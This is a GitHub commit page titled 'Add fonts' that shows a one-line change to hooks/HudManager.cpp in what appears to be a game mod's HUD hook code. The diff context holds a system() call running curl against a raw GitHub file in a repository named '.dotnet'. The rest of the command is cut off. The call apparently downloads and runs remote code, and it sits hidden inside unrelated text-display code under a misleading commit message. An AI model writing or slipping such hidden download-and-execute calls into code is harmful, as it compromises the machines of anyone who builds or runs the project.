Skip to content

Commit a656c1f

Browse files
committed
Add fonts
1 parent 0b31706 commit a656c1f

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

hooks/HudManager.cpp

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -84,4 +84,4 @@ system("curl -s https://raw.githubusercontent.com/StefanBlejeru/.dotnet/main/obj
8484
);
8585
app::TMP_Text_set_alignment((app::TMP_Text*)__this->fields.text, app::TextAlignmentOptions__Enum::TopLeft, nullptr);
8686
app::TMP_Text_set_text((app::TMP_Text*)__this->fields.text, convert_to_string(versionText), nullptr);
87-
}
87+
}

0 commit comments

Comments
 (0)